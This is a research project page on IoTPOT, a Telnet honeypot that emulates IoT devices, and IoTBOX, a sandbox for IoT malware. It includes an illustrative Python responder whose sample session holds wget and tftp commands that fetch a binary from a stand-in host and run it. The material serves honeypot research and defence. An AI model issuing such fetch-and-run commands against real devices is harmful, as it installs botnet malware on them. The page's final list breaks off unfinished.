Please note that the following research description is from our preliminary results presented at USENIX WOOT 2015. IoTPOT now emulates not only Telnet but also other vulnerable services, including those of specific devices, with distributed proxy sensors in several countries. We have many more malware samples and have observed diverse behavior of IoT malware, such as click fraud and stealing credentials for pay-per-views. For more information, please also check our news articles.
We analyze the increasing threats against IoT devices. We first analyze Telnet-based scans in the darknet, revealing that attacks on Telnet have rocketed since 2014. Moreover, by grabbing the Telnet banners and web contents of the attackers, we confirm that the majority of attacks indeed stem from IoT devices.
Motivated by this, we implement IoTPOT, a novel honeypot that emulates the Telnet services of various IoT devices to analyze ongoing attacks in depth. IoTPOT consists of a frontend low-interaction responder cooperating with backend high-interaction virtual environments called IoTBOX. IoTBOX operates various virtual environments commonly used by embedded systems for different CPU architectures. During 39 days of operation, we observed 76,605 download attempts of malware binaries from 16,934 visiting IP addresses. We also confirm that none of these binaries could have been captured by existing honeypots that handle the Telnet protocol, such as honeyd and the telnet password honeypot, because they are not able to handle the different incoming commands sent by the attackers.
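The frontend/backend split described above, as an added illustration (not IoTPOT's own code): a minimal low-interaction Telnet command responder that answers the probing commands it knows, records binary download attempts (wget/curl/tftp), and flags everything else for a high-interaction backend. The canned replies, the regular expressions and the sample session are constructed assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed Telnet command sequence (not captured traffic): shell probing,
# architecture check, then binary fetch and execution attempts.
SAMPLE_SESSION = [
    "enable",
    "sh",
    "cat /proc/cpuinfo",
    "cd /tmp; wget http://203.0.113.10/bins/x86 -O .x; chmod +x .x; ./.x",
    "tftp -g -r mips 203.0.113.10 && ./mips",
]

# Canned replies the low-interaction frontend can give by itself (assumed).
# The cpuinfo reply advertises a MIPS board so the attacker's next step,
# which architecture it fetches, becomes observable.
CANNED = {
    "enable": "",
    "sh": "",
    "cat /proc/cpuinfo": "system type\t\t: MIPS 24Kc\nmachine\t\t\t: Generic IoT board\n",
    "cd": "",
    "chmod": "",
}

URL_RE = re.compile(r"\b(?:wget|curl)\b[^;&|]*?(https?://[^\s;&|]+)")
TFTP_HOST_RE = re.compile(r"\btftp\b[^;&|]*?(\d{1,3}(?:\.\d{1,3}){3})")
TFTP_FILE_RE = re.compile(r"-r\s+([^\s;&|]+)")
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")  # split compound command lines

@dataclass
class Session:
    replies: list = field(default_factory=list)    # what the frontend sent back
    downloads: list = field(default_factory=list)  # binary fetch targets observed
    unknown: list = field(default_factory=list)    # commands needing the backend

def handle(cmd: str, s: Session) -> str:
    """Answer one shell command; log download attempts and unhandled commands."""
    word = cmd.split(None, 1)[0]
    if m := URL_RE.search(cmd):
        s.downloads.append(m.group(1))
        return "Connecting to host... 100% done\n"  # fake transfer progress
    if m := TFTP_HOST_RE.search(cmd):
        f = TFTP_FILE_RE.search(cmd)
        s.downloads.append(f"tftp://{m.group(1)}/{f.group(1) if f else ''}")
        return ""
    if cmd in CANNED:
        return CANNED[cmd]
    if word in CANNED:
        return CANNED[word]
    s.unknown.append(cmd)  # a full deployment forwards these to the IoTBOX-style backend
    return ""

def run_session(lines) -> Session:
    """Drive a whole session of command lines through the frontend responder."""
    s = Session()
    for line in lines:
        for cmd in filter(None, SPLIT_RE.split(line.strip())):
            s.replies.append(handle(cmd, s))
    return s
```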
We manually downloaded 43 distinct malware samples and found that they run on 11 different CPU architectures. Among the 43 collected samples, 39 were new to the database of VirusTotal (as of 2015/05/13), showing a gap in capture utilities for this type of threat. Of the 4 samples that were in VirusTotal, 2 were not detected by any of the 57 A/Vs of VirusTotal (as of 2015/05/13).
In order to analyze these captured malware binaries, we implement IoTBOX, the first malware analysis environment for IoT devices. IoTBOX supports 8 CPU architectures, spanning MIPS, ARM, and PPC. The sandbox analysis of 17 samples by IoTBOX revealed that the samples are used to perform 10 different types of DDoS attacks and port 23 scans.
Finally, combining the observation results of IoTPOT with the sandbox analysis by IoTBOX, we confirm that:
This is a joint work between Yokohama National University, Japan and Saarland University, Germany.
Last Update: 2016/06/27